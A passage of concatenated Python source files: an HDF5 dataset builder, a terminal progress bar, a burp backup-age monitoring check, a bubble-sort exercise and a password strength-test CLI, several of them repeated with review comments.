            res = flatten_dict(res)
            _add.source(f, this_sources[n], res, ds_kwargs, refed_paths)
            # Remember which paths already got a reference so _add can skip them.
            refed_paths = refed_paths | set(res.keys())
        f.flush()
    if parallelism == 'mp':
        executor.close()
        executor.join()
    # run after_create
    db = cls(filename, mode="r+", keep_open=False)
    for key, feature in schema.items():
        # Only invoke the hook when the feature actually overrides it.
        if getattr(type(feature), "after_create", Feature.after_create) != Feature.after_create:
            feature.after_create(db, key)
    f.flush()
    # voila!
    return cls(filename, mode if mode != 'w' else "r+", keep_open)
def _compute(fdict, proxy, parallelism, n_workers, destination):
    """Apply ``fdict``'s functions to every source referenced by ``proxy``
    and store each result in ``destination``.

    :param fdict: mapping passed through to ``apply_and_store``.
    :param proxy: feature proxy; its ``refs`` mask selects the sources to process.
    :param parallelism: one of 'mp', 'threads', 'none' (validated by get_executor).
    :param n_workers: number of workers / batch size.
    :param destination: object receiving results via ``destination.add(src, r)``.
    """
    # np.bool was removed in NumPy 1.24; the builtin bool is the documented
    # replacement and behaves identically for astype().
    mask = proxy.refs[:].astype(bool)
    sources = list(proxy.owner.__src__.id[mask])
    # get_executor validates ``parallelism`` and raises ValueError on anything
    # unknown, so no separate guard is needed here.
    executor = get_executor(n_workers, parallelism)
    n_sources = len(sources)
    batch_size = n_workers * 1
    func = partial(apply_and_store, fdict=fdict, proxy=proxy)
    for i in tqdm(range(1 + n_sources // batch_size), leave=False):
        start_loc = max([i * batch_size, 0])
        end_loc = min([(i + 1) * batch_size, n_sources])
        this_sources = sources[start_loc:end_loc]
        # The executor already encapsulates the flavour of parallelism, so one
        # map call covers 'mp', 'threads' and 'none' (the three branches in the
        # previous version were identical).
        for src, r in executor.map(func, this_sources):
            destination.add(src, r)
    if parallelism == 'mp':
        executor.close()
        executor.join()
    return
import numpy as np
from multiprocess import cpu_count, Pool
from concurrent.futures import ThreadPoolExecutor
import os
from functools import partial
from tqdm import tqdm
from .features import Feature
from .crud import _add, _load, H5_NONE, SRC_KEY, apply_and_store
from .utils import flatten_dict
__all__ = [
"_create",
'_compute',
]
class SerialExecutor:
def map(self, func, iterable):
return map(func, iterable)
def __enter__(self):
return self
def __exit__(self, exc_type, exc_val, exc_tb):
return
def close(self):
pass
def join(self):
pass
def get_executor(n_workers=cpu_count(), parallelism='mp'):
if parallelism == 'mp':
executor = Pool(n_workers)
elif parallelism == 'threads':
executor = ThreadPoolExecutor(n_workers)
elif parallelism == 'none':
executor = SerialExecutor()
else:
raise ValueError(f"parallelism must be one of ['mp', 'threads', 'none']. Got '{parallelism}'")
return executor
def _create(cls,
filename,
sources,
mode="w",
schema={},
n_workers=cpu_count(),
parallelism='mp',
keep_open=False,
**h5_kwargs
):
if not schema:
# get schema from the class attributes
schema = {attr: val for attr, val in cls.__dict__.items() if isinstance(val, Feature)}
if not schema:
raise ValueError("schema cannot be empty. Either provide one to create()"
" or attach Feature attributes to this class.")
# avoid blocking errors from h5py
if os.path.exists(filename) and mode == 'w':
os.remove(filename)
f = h5py.File(filename, mode, **h5_kwargs)
f.require_group(SRC_KEY)
# create groups from schema and write attrs
groups = {key: f.create_group(key) if key not in f else f[key] for key in schema.keys()}
for key, grp in groups.items():
for k, v in schema[key].attrs.items():
grp.attrs[k] = v if v is not None else H5_NONE
f.flush()
# initialize ds_kwargs from schema
ds_kwargs = {key: getattr(feature, "__ds_kwargs__", {}).copy() for key, feature in schema.items()}
# get flavour of parallelism
try:
executor = get_executor(n_workers, parallelism)
except ValueError as e:
f.close()
raise e
# run loading routine
n_sources = len(sources)
batch_size = n_workers * 1
refed_paths = set()
for i in tqdm(range(1 + n_sources // batch_size), leave=False):
start_loc = max([i * batch_size, 0])
end_loc = min([(i + 1) * batch_size, n_sources])
this_sources = sources[start_loc:end_loc]
try:
results = executor.map(partial(_load, schema=schema, guard_func=Feature.load), this_sources)
except Exception as e:
f.close()
if mode == "w":
os.remove(filename)
if parallelism == 'mp':
executor.terminate()
raise e
# write results
for n, res in enumerate(results):
if not res:
continue
res = flatten_dict(res)
_add.source(f, this_sources[n], res, ds_kwargs, refed_paths)
refed_paths = refed_paths | set(res.keys())
f.flush()
if parallelism == 'mp':
executor.close()
executor.join()
# run after_create
db = cls(filename, mode="r+", keep_open=False)
for key, feature in schema.items():
if getattr(type(feature), "after_create", Feature.after_create) != Feature.after_create:
feature.after_create(db, key)
f.flush()
# voila!
return cls(filename, mode if mode != 'w' else "r+", keep_open)
def _compute(fdict, proxy, parallelism, n_workers, destination):
sources = [src for src in proxy.owner.__src__.id[proxy.refs[:].astype(np.bool)]]
executor = get_executor(n_workers, parallelism)
n_sources = len(sources)
batch_size = n_workers * 1
for i in tqdm(range(1 + n_sources // batch_size), leave=False):
start_loc = max([i * batch_size, 0])
end_loc = min([(i + 1) * batch_size, n_sources])
this_sources = sources[start_loc:end_loc]
if parallelism in ('mp', 'none'):
res = executor.map(partial(apply_and_store, fdict=fdict, proxy=proxy), this_sources)
elif parallelism == 'threads':
res = executor.map(partial(apply_and_store, fdict=fdict, proxy=proxy), this_sources)
else:
raise NotImplementedError
for src, r in res:
destination.add(src, r)
if parallelism == 'mp':
executor.close()
executor.join()
return | 0.357343 | 0.184768 |
import sys
import time
class ProgressBar:
    """Renders a two-line status area plus a percentage bar on the terminal.

    ANSI escape sequences move the cursor so the same screen region can be
    redrawn on every update; ``lines_subplot`` extra rows below the bar are
    reserved for a caller-drawn sub-plot.
    """

    def __init__(self, bar_length, total_steps, unit, lines_subplot):
        self.bar_length = bar_length
        self.total_steps = total_steps
        self.unit = unit
        self.lines_subplot = lines_subplot

    def _up(self, step=1):
        # Flush after every escape code; some terminals garble buffered ones.
        for _ in range(step):
            sys.stdout.write('\x1b[1A')
            sys.stdout.flush()

    def _down(self, step=1):
        # A plain newline moves down one row, same effect as '\x1b[1B'.
        for _ in range(step):
            sys.stdout.write('\n')
            sys.stdout.flush()

    def _clear_line(self):
        # Erase from the cursor to the end of the line.
        sys.stdout.write("\033[K")

    def _print_status(self, step, summary=""):
        self._clear_line()
        print(f"Evaluating {self.unit} {step} of {self.total_steps}")
        self._clear_line()
        print(summary)

    def _print_bar(self, percent):
        filled = int(percent / 100 * self.bar_length)
        bar = '*' * filled + ' ' * (self.bar_length - filled)
        print(f'{int(percent):3d} % [{bar}]', end='\r')

    def start(self):
        # Draw the initial, empty state of the display.
        self._print_status(0, "Start benchmark")
        self._print_bar(0)

    def end(self):
        # Draw the final state, then move past the bar and the sub-plot rows.
        self._print_status(self.total_steps, "Finished benchmark")
        self._print_bar(100)
        self._down(1 + self.lines_subplot)

    def update(self, curr_step, summary):
        self._print_status(curr_step, summary)
        self._print_bar(int(100 * (curr_step - 1) / self.total_steps))

    def jump_main_to_sub_plot(self):
        self._down(1)

    def jump_sub_to_main_plot(self):
        self._up(1 + self.lines_subplot)

    def flash(self):
        # Move two rows up and wipe that line so it can be redrawn.
        self._up(2)
        self._clear_line()
import sys
import time
class ProgressBar:
    """Terminal progress bar with a two-line status area, the bar itself,
    and an optional multi-line sub-plot area below it."""
    def __init__(self, bar_length, total_steps, unit, lines_subplot):
        # bar_length    -- width of the bar in characters
        # total_steps   -- number of steps that corresponds to 100 %
        # unit          -- label used in the status line (e.g. "epoch")
        # lines_subplot -- number of extra lines reserved below the bar
        self.bar_length = bar_length
        self.total_steps = total_steps
        self.unit = unit
        self.lines_subplot = lines_subplot
    def _up(self, step=1):
        # My terminal breaks if we don't flush after the escape-code
        for i in range(step):
            sys.stdout.write('\x1b[1A')
            sys.stdout.flush()
    def _down(self, step=1):
        # I could use '\x1b[1B' here, but newline is faster and easier
        for i in range(step):
            sys.stdout.write('\n')
            sys.stdout.flush()
    def _clear_line(self):
        # ANSI "erase from cursor to end of line".
        sys.stdout.write("\033[K")
    def _print_status(self, step, summary = ""):
        # Two status lines: the progress counter and a free-form summary.
        self._clear_line()
        print("Evaluating %s %d of %d" % (self.unit, step, self.total_steps))
        self._clear_line()
        print(summary)
    def _print_bar(self, percent):
        # '\r' keeps the cursor on the bar line so it is redrawn in place.
        arrow = '*' * int(percent / 100 * self.bar_length)
        spaces = ' ' * (self.bar_length - len(arrow))
        print('%3d %% [%s%s]' % (percent, arrow, spaces), end='\r')
    def start(self):
        # Initial (step 0, 0 %) state.
        curr_step = 0
        percent = 0
        self._print_status(curr_step, "Start benchmark")
        self._print_bar(percent)
    def end(self):
        # Final state; then move past the bar and sub-plot area.
        curr_step = self.total_steps
        percent = 100
        self._print_status(curr_step, "Finished benchmark")
        self._print_bar(percent)
        for i in range(1 + self.lines_subplot):
            sys.stdout.write('\n')
        sys.stdout.flush()
    def update(self, curr_step, summary):
        # NOTE(review): (curr_step - 1) reports the previous step's
        # percentage — confirm this off-by-one is intentional.
        percent = int(100 * (curr_step - 1) / self.total_steps)
        self._print_status(curr_step, summary)
        self._print_bar(percent)
    def jump_main_to_sub_plot(self):
        # Cursor: main bar area -> sub-plot area.
        self._down(1)
    def jump_sub_to_main_plot(self):
        # Cursor: sub-plot area -> main bar area.
        self._up((1 + self.lines_subplot))
    def flash(self):
        # Jump two lines up and clear so the status can be redrawn.
        sys.stdout.write('\x1b[1A\x1b[1A')
        sys.stdout.flush()
        # NOTE(review): the trailing "| ... |" below is a dataset
        # row-separator artifact, not part of the program.
        self._clear_line() | 0.279042 | 0.198569 |
# https://github.com/regilero/check_burp_backup_age
# check_burp_backup_age: Local check, Check freshness of last backup for
# a given host name.
import sys
import os
import argparse
import time
import datetime
class CheckBurp(object):
    """Nagios-style local check: alert when the last successful burp
    backup for a host is older than the warning/critical thresholds.

    NOTE(review): this copy uses Python-2-only syntax (print statements);
    it will not run under Python 3.
    """
    def __init__(self):
        self._program = "check_burp_backup_age"
        self._version = "0.1"
        self._author = "<NAME> (regilero)"
        self._nick = "BURP"
        # Standard Nagios plugin exit codes.
        self._ok = 0
        self._warning = 1
        self._critical = 2
        self._unknown = 3
        self._pending = 4
        self.args = None
        self.diff_min = None
    def critical(self, msg):
        # Emit a CRITICAL status line and exit with code 2.
        print '{0} CRITICAL - {1}'.format(self._nick, msg)
        sys.exit(self._critical)
    def warning(self, msg):
        # Emit a WARNING status line and exit with code 1.
        print '{0} WARNING - {1}'.format(self._nick, msg)
        sys.exit(self._warning)
    def unknown(self, msg):
        # Emit an UNKNOWN status line and exit with code 3.
        print '{0} UNKNOWN - {1}'.format(self._nick, msg)
        sys.exit(self._unknown)
    def ok(self, msg):
        # Emit an OK status line and exit with code 0.
        print '{0} OK - {1}'.format(self._nick, msg)
        sys.exit(self._ok)
    def opt_parser(self):
        # Parse CLI options into self.args and derive the backup paths.
        parser = argparse.ArgumentParser(
            prog=self._program,
            description=("Local check, Check freshness of last backup for a "
                         "given host name.\n\nRunning on the backup server "
                         "this program will check the timestamp file of the "
                         "last backup for a given host and get the age of this"
                         " last successful run. This age is then compared to "
                         "thresolds to generate alerts."),
            epilog=("Note that this is a local check, running on the backup "
                    "server.\nSo the hostname argument is not used to perform"
                    " any distant connection.\n"))
        parser.add_argument('-v', '--version',
                            version='%(prog)s {0}'.format(self._version),
                            action='version', help='show program version')
        parser.add_argument('-H', '--hostname', required=True, nargs='?',
                            help=('hostname (directory name for burp) '
                                  '[default: %(default)s]'))
        parser.add_argument('-d', '--directory', default='/backups', nargs='?',
                            help=('base directory path for backups (where are '
                                  'the backups?) [default: %(default)s]'))
        parser.add_argument('-w', '--warning', default=1560, const=1560,
                            type=int, nargs='?',
                            help=('Warning thresold, time in minutes before '
                                  'going to warning [default: %(default)s]'))
        parser.add_argument('-c', '--critical', default=1800, const=1800,
                            type=int, nargs='?',
                            help=('Critical thresold, time in minutes before '
                                  'going to critical [default: %(default)s]'))
        self.args = vars(parser.parse_args())
        # Thresholds must be ordered warning < critical to make sense.
        if self.args['warning'] >= self.args['critical']:
            self.unknown(('Warning thresold ({0}) should be lower than the '
                          'critical one ({1})').format(self.args['warning'],
                                                       self.args['critical']))
        self.bckpdir = self.args['directory'] + '/' + self.args['hostname']
        self.bckpdircur = self.bckpdir + '/current'
        self.ftimestamp = self.bckpdircur + '/timestamp'
    def test_backup_dirs(self):
        # Any missing directory on the path to the backup is CRITICAL.
        if not os.path.isdir(self.args['directory']):
            self.critical(('Base backup directory {0}'
                           ' does not exists').format(self.args['directory']))
        if not os.path.isdir(self.bckpdir):
            self.critical(('Host backup directory {0}'
                           ' does not exists').format(self.bckpdir))
        if not os.path.isdir(self.bckpdircur):
            self.critical(('Current Host backup directory {0}'
                           ' does not exists').format(self.bckpdircur))
    def read_backup_timestamp(self):
        # Read the burp timestamp file and compute the backup's age as
        # self.diff_min (minutes) and self.diff_human (display string).
        if not os.path.isfile(self.ftimestamp):
            self.critical(('timestamp file '
                           'does not exists ({0})').format(self.ftimestamp))
        lines = []
        with open(self.ftimestamp) as f:
            lines = f.readlines()
        if not len(lines):
            self.critical(('timestamp file seems'
                           ' to be empty ({0})').format(self.ftimestamp))
        tline = lines.pop()
        parts = tline.split()
        if len(parts) not in [3, 4]:
            self.critical(('invalid syntax in '
                           'timestamp file ({0})').format(self.ftimestamp))
        btime = time.strptime(parts[1] + ' ' + parts[2], "%Y-%m-%d %H:%M:%S")
        btime = datetime.datetime(*btime[:6])
        ctime = time.localtime()
        ctime = datetime.datetime(*ctime[:6])
        diff = ctime-btime
        self.diff_min = int((diff.seconds + (diff.days * 24 * 3600))/60)
        self.diff_human = ('{0} day(s) {1:02d} hour(s) {2:02d} '
                           'minute(s)').format(diff.days,
                                               diff.seconds//3600,
                                               (diff.seconds//60) % 60)
    def test_thresolds(self):
        # Map the computed age onto OK / WARNING / CRITICAL (each of
        # these helpers exits the process).
        if self.diff_min >= self.args['warning']:
            if self.diff_min >= self.args['critical']:
                self.critical(('Last backup is too old: '
                               '{0} ({1}>={2})').format(self.diff_human,
                                                        self.diff_min,
                                                        self.args['critical']))
            else:
                self.warning(('Last backup starts to get old: '
                              '{0} ({1}>={2})').format(self.diff_human,
                                                       self.diff_min,
                                                       self.args['warning']))
        else:
            self.ok(('Last backup is fresh enough: '
                     '{0} ({1}<{2})').format(self.diff_human,
                                             self.diff_min,
                                             self.args['warning']))
    def run(self):
        # Full check sequence; every step exits on its own on failure.
        self.opt_parser()
        self.test_backup_dirs()
        self.read_backup_timestamp()
        self.test_thresolds()
        self.unknown('No exit made before end of check, this is not normal.')
def main():
    """Entry point: run the check, mapping any unexpected error onto the
    Nagios UNKNOWN exit code (3).

    Fixes: py2-only ``except Exception, e`` and ``print`` statement
    (both fail to parse under Python 3; the replacements also work on
    Python >= 2.6), and the "UNKNOW" typo in the error message.
    """
    try:
        check_burp = CheckBurp()
        check_burp.run()
    except Exception as e:
        # Catch-all so a crash still yields a valid Nagios status line.
        print('Unknown error UNKNOWN - {0}'.format(e))
        sys.exit(3)
# Run the check only when executed as a script (not on import).
if __name__ == "__main__":
    # NOTE(review): the trailing "| ... |" below is a dataset
    # row-separator artifact, not part of the program.
    main() | localsettings_monitoring/files/check_burp_backup_age.py |
# https://github.com/regilero/check_burp_backup_age
# check_burp_backup_age: Local check, Check freshness of last backup for
# a given host name.
import sys
import os
import argparse
import time
import datetime
class CheckBurp(object):
    """Nagios-style local check: alert when the last successful burp
    backup for a host is older than the warning/critical thresholds.

    Exit codes follow the Nagios plugin convention:
    0 OK, 1 WARNING, 2 CRITICAL, 3 UNKNOWN.

    Fixes in this revision: the py2-only ``print`` statements were
    rewritten as ``print(...)`` calls (single-argument form, valid on
    both Python 2 and 3 — the originals fail to parse on Python 3), and
    a stray ``break;`` semicolon was removed.
    """
    def __init__(self):
        self._program = "check_burp_backup_age"
        self._version = "0.1"
        self._author = "<NAME> (regilero)"
        self._nick = "BURP"
        # Standard Nagios plugin exit codes.
        self._ok = 0
        self._warning = 1
        self._critical = 2
        self._unknown = 3
        self._pending = 4
        self.args = None
        self.diff_min = None
    def critical(self, msg):
        """Emit a CRITICAL status line and exit with code 2."""
        print('{0} CRITICAL - {1}'.format(self._nick, msg))
        sys.exit(self._critical)
    def warning(self, msg):
        """Emit a WARNING status line and exit with code 1."""
        print('{0} WARNING - {1}'.format(self._nick, msg))
        sys.exit(self._warning)
    def unknown(self, msg):
        """Emit an UNKNOWN status line and exit with code 3."""
        print('{0} UNKNOWN - {1}'.format(self._nick, msg))
        sys.exit(self._unknown)
    def ok(self, msg):
        """Emit an OK status line and exit with code 0."""
        print('{0} OK - {1}'.format(self._nick, msg))
        sys.exit(self._ok)
    def opt_parser(self):
        """Parse CLI options into ``self.args`` and derive backup paths."""
        parser = argparse.ArgumentParser(
            prog=self._program,
            description=("Local check, Check freshness of last backup for a "
                         "given host name.\n\nRunning on the backup server "
                         "this program will check the timestamp file of the "
                         "last backup for a given host and get the age of this"
                         " last successful run. This age is then compared to "
                         "thresolds to generate alerts."),
            epilog=("Note that this is a local check, running on the backup "
                    "server.\nSo the hostname argument is not used to perform"
                    " any distant connection.\n"))
        parser.add_argument('-v', '--version',
                            version='%(prog)s {0}'.format(self._version),
                            action='version', help='show program version')
        parser.add_argument('-H', '--hostname', required=True, nargs='?',
                            help=('hostname (directory name for burp) '
                                  '[default: %(default)s]'))
        parser.add_argument('-d', '--directory', default='/backups', nargs='?',
                            help=('base directory path for backups (where are '
                                  'the backups?) [default: %(default)s]'))
        parser.add_argument('-w', '--warning', default=1560, const=1560,
                            type=int, nargs='?',
                            help=('Warning thresold, time in minutes before '
                                  'going to warning [default: %(default)s]'))
        parser.add_argument('-c', '--critical', default=1800, const=1800,
                            type=int, nargs='?',
                            help=('Critical thresold, time in minutes before '
                                  'going to critical [default: %(default)s]'))
        self.args = vars(parser.parse_args())
        # Thresholds must be ordered warning < critical to make sense.
        if self.args['warning'] >= self.args['critical']:
            self.unknown(('Warning thresold ({0}) should be lower than the '
                          'critical one ({1})').format(self.args['warning'],
                                                       self.args['critical']))
        self.bckpdir = self.args['directory'] + '/' + self.args['hostname']
        self.bckpdircur = self.bckpdir + '/current'
        self.ftimestamp = self.bckpdircur + '/timestamp'
    def test_backup_dirs(self):
        """CRITICAL if any directory on the path to the backup is missing."""
        if not os.path.isdir(self.args['directory']):
            self.critical(('Base backup directory {0}'
                           ' does not exists').format(self.args['directory']))
        if not os.path.isdir(self.bckpdir):
            self.critical(('Host backup directory {0}'
                           ' does not exists').format(self.bckpdir))
        if not os.path.isdir(self.bckpdircur):
            self.critical(('Current Host backup directory {0}'
                           ' does not exists').format(self.bckpdircur))
    def read_backup_timestamp(self):
        """Read the burp timestamp file and compute the backup's age.

        Sets ``self.diff_min`` (age in minutes) and ``self.diff_human``
        (display string). Exits CRITICAL on a missing/empty/bad file.
        """
        if not os.path.isfile(self.ftimestamp):
            self.critical(('timestamp file '
                           'does not exists ({0})').format(self.ftimestamp))
        lines = []
        with open(self.ftimestamp) as f:
            lines = f.readlines()
        if not len(lines):
            self.critical(('timestamp file seems'
                           ' to be empty ({0})').format(self.ftimestamp))
        tline = lines.pop()
        parts = tline.split()
        if len(parts) not in [3, 4]:
            self.critical(('invalid syntax in '
                           'timestamp file ({0})').format(self.ftimestamp))
        btime = time.strptime(parts[1] + ' ' + parts[2], "%Y-%m-%d %H:%M:%S")
        btime = datetime.datetime(*btime[:6])
        ctime = time.localtime()
        ctime = datetime.datetime(*ctime[:6])
        diff = ctime-btime
        self.diff_min = int((diff.seconds + (diff.days * 24 * 3600))/60)
        self.diff_human = ('{0} day(s) {1:02d} hour(s) {2:02d} '
                           'minute(s)').format(diff.days,
                                               diff.seconds//3600,
                                               (diff.seconds//60) % 60)
    def test_thresolds(self):
        """Map the computed age onto OK/WARNING/CRITICAL (each exits)."""
        if self.diff_min >= self.args['warning']:
            if self.diff_min >= self.args['critical']:
                self.critical(('Last backup is too old: '
                               '{0} ({1}>={2})').format(self.diff_human,
                                                        self.diff_min,
                                                        self.args['critical']))
            else:
                self.warning(('Last backup starts to get old: '
                              '{0} ({1}>={2})').format(self.diff_human,
                                                       self.diff_min,
                                                       self.args['warning']))
        else:
            self.ok(('Last backup is fresh enough: '
                     '{0} ({1}<{2})').format(self.diff_human,
                                             self.diff_min,
                                             self.args['warning']))
    def run(self):
        """Full check sequence; every step exits on its own on failure."""
        self.opt_parser()
        self.test_backup_dirs()
        self.read_backup_timestamp()
        self.test_thresolds()
        self.unknown('No exit made before end of check, this is not normal.')
def main():
    """Entry point: run the check, mapping any unexpected error onto the
    Nagios UNKNOWN exit code (3).

    Fixes: py2-only ``except Exception, e`` and ``print`` statement
    (both fail to parse under Python 3; the replacements also work on
    Python >= 2.6), and the "UNKNOW" typo in the error message.
    """
    try:
        check_burp = CheckBurp()
        check_burp.run()
    except Exception as e:
        # Catch-all so a crash still yields a valid Nagios status line.
        print('Unknown error UNKNOWN - {0}'.format(e))
        sys.exit(3)
# Run the check only when executed as a script (not on import).
if __name__ == "__main__":
    # NOTE(review): the trailing "| ... |" below is a dataset
    # row-separator artifact, not part of the program.
    main() | 0.326271 | 0.21214 |
import random
import timeit
import random
# sort the given list
# first of all create test samples
# Each test maps an input list to the expected ascending sort result.
test0 = {'input_list': [0, 2, 3, -5, 23, -42],
         'output_list': [-42, -5, 0, 2, 3, 23]}
test1 = {'input_list': [3, 5, 6, 8, 9, 10, 99],
         'output_list': [3, 5, 6, 8, 9, 10, 99]}
test2 = {'input_list': [99, 10, 9, 8, 6, 5, 3],
         'output_list': [3, 5, 6, 8, 9, 10, 99]}
test3 = {'input_list': [5, -12, 2, 6, 1, 23, 7, 7, -12, 6, 12, 1, -243, 1, 0],
         'output_list': [-243, -12, -12, 0, 1, 1, 1, 2, 5, 6, 6, 7, 7, 12, 23]}
test4 = {'input_list': [],
         'output_list': []}
test5 = {'input_list': [14],
         'output_list': [14]}
# NOTE(review): test6 nests the values in an inner list, so it actually
# exercises a one-element outer list, not a seven-element sort.
test6 = {'input_list': [[42, 42, 42, 42, 42, 42, 42]],
         'output_list': [[42, 42, 42, 42, 42, 42, 42]]}
in_list = list(range(100))
out_list = list(range(100))
random.shuffle(in_list)
test7 = {'input_list': in_list,
         'output_list': out_list}
tests = [test0, test1, test2, test3, test4, test5, test6, test7]
def bubble_sort(g_list: list) -> list:
    """Return a sorted copy of *g_list* (ascending) using bubble sort.

    Fixes in this revision:
    * ``g_list_copy = g_list`` only aliased the argument, so the caller's
      list was mutated despite the comment promising a copy — a real copy
      is now made.
    * the ``x + 1 == len(...)`` guard was unreachable (``range`` already
      stops one element short), and calling ``sorted()`` after every pass
      made the loop O(n^2 log n); the standard swapped-flag termination
      is used instead.
    """
    result = list(g_list)  # real copy: the input list is left untouched
    # Shrink the scanned prefix each pass — the largest remaining element
    # bubbles to the end of the unsorted region every time.
    for end in range(len(result) - 1, 0, -1):
        swapped = False
        for i in range(end):
            if result[i] > result[i + 1]:
                result[i], result[i + 1] = result[i + 1], result[i]
                swapped = True
        if not swapped:  # no swap in a full pass -> already sorted
            break
    return result
# Smoke test: sort test2 and print whether it matches the expected output.
bubble_sort(test2['input_list'])
print(bubble_sort(test2['input_list']) == test2['output_list'])
def bubble_sort2(nums):
    """Return *nums* sorted ascending with bubble sort.

    The argument itself is never modified; the sort runs on a copy.
    """
    result = list(nums)
    limit = len(result) - 1
    # n-1 full passes; each pass compares every adjacent pair and swaps
    # out-of-order neighbours.
    for _ in range(limit):
        for idx in range(limit):
            left, right = result[idx], result[idx + 1]
            if left > right:
                result[idx], result[idx + 1] = right, left
    return result
# Smoke test: sort test3 and print whether it matches the expected output.
bubble_sort2(test3['input_list'])
# NOTE(review): the trailing "| ... |" below is a dataset row-separator
# artifact (it also carries the next row's first line), not code.
print(bubble_sort2(test3['input_list']) == test3['output_list']) | bubble_sort/bubble_sort_exercise.py | import random
import timeit
import random
# sort the given list
# first of all create test samples
# Each test maps an input list to the expected ascending sort result.
test0 = {'input_list': [0, 2, 3, -5, 23, -42],
         'output_list': [-42, -5, 0, 2, 3, 23]}
test1 = {'input_list': [3, 5, 6, 8, 9, 10, 99],
         'output_list': [3, 5, 6, 8, 9, 10, 99]}
test2 = {'input_list': [99, 10, 9, 8, 6, 5, 3],
         'output_list': [3, 5, 6, 8, 9, 10, 99]}
test3 = {'input_list': [5, -12, 2, 6, 1, 23, 7, 7, -12, 6, 12, 1, -243, 1, 0],
         'output_list': [-243, -12, -12, 0, 1, 1, 1, 2, 5, 6, 6, 7, 7, 12, 23]}
test4 = {'input_list': [],
         'output_list': []}
test5 = {'input_list': [14],
         'output_list': [14]}
# NOTE(review): test6 nests the values in an inner list, so it actually
# exercises a one-element outer list, not a seven-element sort.
test6 = {'input_list': [[42, 42, 42, 42, 42, 42, 42]],
         'output_list': [[42, 42, 42, 42, 42, 42, 42]]}
in_list = list(range(100))
out_list = list(range(100))
random.shuffle(in_list)
test7 = {'input_list': in_list,
         'output_list': out_list}
tests = [test0, test1, test2, test3, test4, test5, test6, test7]
def bubble_sort(g_list: list) -> list:
    """Return a sorted copy of *g_list* (ascending) using bubble sort.

    Fixes in this revision:
    * ``g_list_copy = g_list`` only aliased the argument, so the caller's
      list was mutated despite the comment promising a copy — a real copy
      is now made.
    * the ``x + 1 == len(...)`` guard was unreachable (``range`` already
      stops one element short), and calling ``sorted()`` after every pass
      made the loop O(n^2 log n); the standard swapped-flag termination
      is used instead.
    """
    result = list(g_list)  # real copy: the input list is left untouched
    # Shrink the scanned prefix each pass — the largest remaining element
    # bubbles to the end of the unsorted region every time.
    for end in range(len(result) - 1, 0, -1):
        swapped = False
        for i in range(end):
            if result[i] > result[i + 1]:
                result[i], result[i + 1] = result[i + 1], result[i]
                swapped = True
        if not swapped:  # no swap in a full pass -> already sorted
            break
    return result
# Smoke test: sort test2 and print whether it matches the expected output.
bubble_sort(test2['input_list'])
print(bubble_sort(test2['input_list']) == test2['output_list'])
def bubble_sort2(nums):
    """Return *nums* sorted ascending with bubble sort.

    The argument itself is never modified; the sort runs on a copy.
    """
    result = list(nums)
    limit = len(result) - 1
    # n-1 full passes; each pass compares every adjacent pair and swaps
    # out-of-order neighbours.
    for _ in range(limit):
        for idx in range(limit):
            left, right = result[idx], result[idx + 1]
            if left > right:
                result[idx], result[idx + 1] = right, left
    return result
# Smoke test: sort test3 and print whether it matches the expected output.
bubble_sort2(test3['input_list'])
# NOTE(review): the trailing "| ... |" below is a dataset row-separator
# artifact, not code.
print(bubble_sort2(test3['input_list']) == test3['output_list']) | 0.118449 | 0.392279 |
import os
import os.path
from StrengthTest import StrengthTest
settings = 'settings.txt'
def prompt(again=None):
    """Interactively offer to run the strength test.

    again -- None for the first invocation; any other value marks a
             repeat prompt (only the question's wording changes).

    Fixes: compare to None with ``is`` (PEP 8), and use ``response[:1]``
    so an empty answer re-prompts instead of raising IndexError on
    ``response[0]``.
    """
    yesno = " [Yes/No] "
    if again is None:
        ask = "Would you like to run the test now?" + yesno
    else:
        ask = "Would you like to run the test again?" + yesno
    response = input(ask)
    answer = response[:1].lower()  # '' for an empty reply, never IndexError
    if answer == 'y':
        operations()
    elif answer == 'n':
        ask = "Would you like to reconfigure the test settings?" + yesno
        response = input(ask)
        if response[:1].lower() == 'y':
            # Importing Setup runs the interactive (re)configuration script.
            import Setup
            prompt()
            return
    else:
        # Unrecognized (or empty) answer: ask again.
        prompt()
def operations():
    """Load thresholds from the settings file, run one strength test on a
    password read from stdin, print the result, and re-prompt."""
    minLen = 0
    maxLen = 0
    specChar = None
    requires = {}
    #read settings file
    with open(settings,'r') as file:
        for line in file:
            # Everything after the first ':' on the line is the value.
            spot = line.find(':') + 1
            if 'minLength: ' in line:
                # NOTE(review): minLen/maxLen stay raw string slices
                # (including the trailing newline) while the req* values
                # are int()-converted — confirm StrengthTest coerces them.
                minLen = line[spot:]
            elif 'maxLength: ' in line:
                maxLen = line[spot:]
            elif 'reqCap: ' in line:
                requires['reqCap'] = int(line[spot:])
            elif 'reqLow: ' in line:
                requires['reqLow'] = int(line[spot:])
            elif 'reqNum: ' in line:
                requires['reqNum'] = int(line[spot:])
            elif 'reqSpec: ' in line:
                requires['reqSpec'] = int(line[spot:])
            elif 'special: ' in line:
                specChar = line[spot:].rstrip()
            elif 'DONE' in line:
                break;
    test = StrengthTest(minLen, maxLen, requires, specChar)
    results = test.evaluate(input("Please enter your password: "))
    # Clear the console (Windows vs POSIX) before showing the results.
    os.system('cls' if os.name=='nt' else 'clear')
    outputInfo(results)
    prompt(True)
def outputInfo(results):
    """Print one evaluation result dict in a human-readable form."""
    # print() with comma-separated arguments inserts a single space
    # between every piece; kept as-is since changing it would alter the
    # program's output.
    print("Your password, "
          , results['password']
          , " is "
          , ("" if results['viable'] else "not ")
          , "valid.\nScore: "
          , results['score']
          , "\nTotal possible score: "
          , results['max']
          , "\nRating: "
          , round(results['rating'],2)
          , "%\nNotes: "
          , results['notes'])
#script
# Entry: run the test if a settings file exists, otherwise perform the
# first-time setup (importing Setup runs the configuration script).
if os.path.isfile(settings):
    print("Settings found.\n")
    prompt()
else:
    print ("No settings file has been detected.\nPerforming first time setup.\n")
    import Setup
    print ("Setup complete.\n")
    # NOTE(review): the trailing "| ... |" below is a dataset
    # row-separator artifact, not part of the program.
    prompt() | StrengthTestApp.py |
import os
import os.path
from StrengthTest import StrengthTest
settings = 'settings.txt'
def prompt(again=None):
    """Interactively offer to run the strength test.

    again -- None for the first invocation; any other value marks a
             repeat prompt (only the question's wording changes).

    Fixes: compare to None with ``is`` (PEP 8), and use ``response[:1]``
    so an empty answer re-prompts instead of raising IndexError on
    ``response[0]``.
    """
    yesno = " [Yes/No] "
    if again is None:
        ask = "Would you like to run the test now?" + yesno
    else:
        ask = "Would you like to run the test again?" + yesno
    response = input(ask)
    answer = response[:1].lower()  # '' for an empty reply, never IndexError
    if answer == 'y':
        operations()
    elif answer == 'n':
        ask = "Would you like to reconfigure the test settings?" + yesno
